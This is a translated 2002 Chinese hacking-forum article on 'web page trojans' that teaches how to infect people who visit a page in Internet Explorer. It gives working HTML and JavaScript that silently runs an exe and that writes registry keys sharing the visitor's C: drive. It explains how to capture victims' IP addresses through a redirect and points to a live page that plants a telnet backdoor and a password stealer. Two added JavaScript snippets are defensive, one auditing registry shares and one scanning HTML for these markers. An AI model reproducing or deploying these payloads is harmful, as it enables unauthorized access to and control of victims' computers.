Web Page Trojans Revisited | http://www.cshu.net




            www.cshu.net  2002-8-18  Fog Rain Village

              Everyone is familiar with trojans; they are probably the
              fiercest thing in the history of computer viruses. Plenty of
              people know how to use one, but many of them have had to take
              great pains to get the trojan delivered to the other party. Now
              that computers are widespread, I believe very few people on the
              network will readily accept a file sent by someone else, and so
              the web page trojan was born.
              1. The first kind is an HTML page that launches an exe file
              located in the same path: when the browser views the page, the
              exe file is automatically downloaded and run in the background.
              To test it, create a file test.html on the desktop with the
              following content:
              <script language="javascript">
              // Build a zero-size OBJECT whose CODEBASE names the exe in the same path
              run_exe = "<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"";
              run_exe += "CODEBASE=\"test.exe#version=1,1,1,1\">";
              run_exe += "<PARAM NAME=\"_Version\" value=\"65536\">";
              run_exe += "</OBJECT>";
              run_exe += "<HTML><H1>Page loading, please wait....</H1></HTML>";
              // Replace the current document with the generated markup
              document.open();
              document.clear();
              document.writeln(run_exe);
              document.close();
              </script>
              Next, pick any exe file on the desktop; it must be renamed
              test.exe. Now double-click the html file we just created: when
              "Page loading, please wait...." appears, the exe file in the
              same path has also been executed, unconditionally. The advantage
              of this kind of page is that it is simple to write and modify.
              But! Once you have applied for personal home page space, uploaded
              these two files, and try to view your masterpiece through the
              browser, the IE security warning pops up, and I doubt many people
              would take the risk of clicking "Yes". So however perfect this
              web page trojan is locally, once it is put online it cannot get
              past IE's security policy. This little trojan fails.
              2. The second kind writes to the registry through a vulnerability
              in IE itself. I am sure many people have browsed some page and
              found afterwards that their registry was altered: the IE title
              changed to nonsense, the home page changed, the registry editor
              disabled, and so on. These are all the work of web pages that
              modify your registry automatically. So we can likewise make a
              page that fully shares the visitor's hard disk. Again it is an
              html file, with the following content:
              <script language=javascript>
              document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
              function f() {
              // Use the applet to instantiate the object with this CLSID
              a1 = document.applets[0];
              a1.setCLSID("{F935dc22-1cf0-11d0-adb9-00c04fd58a0b}");
              a1.createInstance();
              shl = a1.GetObject();
              // Write the RWC$ share entries (Flags, Type, Path) under the LanMan key
              shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags", 402, "REG_DWORD");
              shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type", 0, "REG_DWORD");
              shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path", "C:\\");
              }
              function init()
              {
              // Run f() one second after the page loads
              setTimeout("f()", 1000);
              }
              init();
              </script>
              When the other party views this page, his C: drive is shared.
              How to get in once it is shared, ha, needs no explanation. But
              although the drive is now shared, you do not know who is looking
              at your page, and you do not know his IP either. No matter, there
              is a very simple method: go to 163 and apply for a domain
              redirect, for example http://123123.126.com. In the target
              address of the link you must fill in your current IP plus a port,
              pointing at your own port 8888. Then modify the HTML code above
              that shares C: and, at the end, add code that jumps automatically
              to http://123123.126.com after 5 seconds. I expect anyone who
              makes web pages can do this, so I will not go on about it here.
              The principle is that when the other party opens this HTML page,
              the malicious code shares his hard disk, and 5 seconds later the
              page automatically redirects and points at port 8888 on your
              computer. At that moment your firewall records that IP x.x.x.x
              attempted to connect to your port 8888 (you need to set up your
              own firewall a little beforehand). That x.x.x.x is the victim's
              IP, and what remains is to connect to the share.
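The registry writes in section 2 leave a share entry named RWC$ with Path C:\ under the LanMan key. The following JavaScript is an added example, not code from the original article: it audits a registry export for entries of that shape. The export text, the DOCS share and the function names are constructed for the illustration.

```javascript
// Added example (not from the article): audit a registry export for shares
// like the RWC$ entry written in section 2. The export below is constructed.
const LANMAN = "\\software\\microsoft\\windows\\currentversion\\network\\lanman\\";
// Parse a REGEDIT4-style export into { keyPath: { valueName: value } }.
function parseReg(text) {
  const keys = {};
  let cur = null;
  for (const line of text.split(/\r?\n/)) {
    const k = line.match(/^\[(.+)\]$/);
    if (k) { cur = keys[k[1]] = {}; continue; }
    const v = cur && line.match(/^"([^"]+)"=(.*)$/);
    if (!v) continue;
    const dword = v[2].match(/^dword:([0-9a-f]{8})$/i);
    cur[v[1]] = dword
      ? parseInt(dword[1], 16)                               // numeric value
      : v[2].replace(/^"|"$/g, "").replace(/\\(.)/g, "$1");  // unescape string
  }
  return keys;
}

// Flag shares that are hidden (name ends in $) or expose a whole drive.
function auditShares(text) {
  const findings = [];
  for (const [key, vals] of Object.entries(parseReg(text))) {
    const at = key.toLowerCase().indexOf(LANMAN);
    if (at < 0) continue;
    const name = key.slice(at + LANMAN.length);
    const path = String(vals.Path || "");
    const reasons = [];
    if (name.endsWith("$")) reasons.push("hidden");
    if (/^[a-z]:\\?$/i.test(path)) reasons.push("drive-root");
    if (reasons.length) findings.push({ name, path, flags: vals.Flags, reasons });
  }
  return findings;
}

const SAMPLE_EXPORT = String.raw`REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\DOCS]
"Flags"=dword:00000191
"Type"=dword:00000000
"Path"="C:\\My Documents"
`;
console.log(auditShares(SAMPLE_EXPORT));
```

The Flags value is reported as found (0x192 is the 402 written by the page) and is not interpreted.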
              This kind of web page trojan is comparatively safe to use and is
              not easily discovered by the other party, but it is troublesome
              to use and involves a lot of things.
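The pages in sections 1 and 2 carry fixed markers: an OBJECT whose CODEBASE names an exe, the com.ms.activeX.ActiveXComponent applet, the CLSID passed to setCLSID, and RegWrite calls under HKLM. The following JavaScript is an added example, not code from the original article: a static check of saved HTML for those markers. The rule ids and sample pages are constructed.

```javascript
// Added example (not from the article): static triage of saved HTML for the
// markers used by the pages in sections 1 and 2. Rule ids are made up here.
const RULES = [
  { id: "object-codebase-exe",     // section 1: OBJECT whose CODEBASE is an .exe
    re: /<object\b[^>]*\bcodebase\s*=\s*["']?[^"'\s>]*\.exe\b/i },
  { id: "msjvm-activexcomponent",  // section 2: applet used to reach ActiveX
    re: /<applet\b[^>]*\bcode\s*=\s*["']?com\.ms\.activex\.activexcomponent\b/i },
  { id: "wsh-shell-clsid",         // section 2: CLSID passed to setCLSID
    re: /f935dc22-1cf0-11d0-adb9-00c04fd58a0b/i },
  { id: "regwrite-hklm",           // section 2: RegWrite under HKLM
    re: /\.regwrite\s*\(\s*["']hklm\\/i },
];

// Both pages build their markup inside JavaScript string literals, so quotes
// and backslashes arrive escaped (\" and \\). Undo one level of escaping
// first, otherwise attribute patterns miss CODEBASE=\"test.exe...\".
function normalize(src) {
  return src.replace(/\\(["'\\])/g, "$1");
}

function scanHtml(src) {
  const text = normalize(src);
  return RULES.filter((r) => r.re.test(text)).map((r) => r.id);
}

// Constructed samples, shortened from the shapes shown in the article.
const SAMPLE_OBJECT = String.raw`<script>
var s = "<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"";
s += " CODEBASE=\"test.exe#version=1,1,1,1\">";
s += "</OBJECT>";
document.writeln(s);
</script>`;

const SAMPLE_REGWRITE = String.raw`<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags", 402, "REG_DWORD");
</script>`;

const SAMPLE_BENIGN =
  '<object data="clip.swf" codebase="http://example.com/player.cab"></object>';

console.log(scanHtml(SAMPLE_OBJECT), scanHtml(SAMPLE_REGWRITE), scanHtml(SAMPLE_BENIGN));
```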
              3. The third kind is, in my personal opinion, the easiest to use
              at present. It turns a carefully prepared exe file into an eml
              file, then uses an IE vulnerability to make the HTML page execute
              that eml file, so your exe file gets executed. Because the code
              is very long, and because the converted code differs for every
              exe file, it is impossible to write it all out here. The address
              given below, http://jy86.126.com, is in fact a domain that
              redirects to http://go8.163.com/forevergujia/jy.htm. When you
              have fully opened this page, only a small backdoor of a little
              over 5k has been opened, and you can completely control the other
              party through telnet x.x.x.x 3385. (This small 5k backdoor is
              winshell5.0, available from Black and White Network. winshell5.0
              also has a very nice feature: it can download a file from a path
              you set beforehand and execute it. The one I placed there is
              Network Thief; if your antivirus software is good enough, it can
              detect Network Thief. This is only a test; in practice you can
              specify a small trojan that is not detected, which I will not go
              into here.) Interested friends are welcome to try it.
              This kind of web page trojan has a high success rate against the
              other party and, apart from being troublesome to make, has no
              drawbacks :)
              All right. All of these techniques depend on vulnerabilities in
              the system, so you cannot go wrong by upgrading often and
              applying patches :)
              ___________________________________________________________
              If you cannot make a web page trojan, post on the forum and ask
              me.



              Original author: Loves -> the cat ->  
              Origin: Loves -> the cat ->  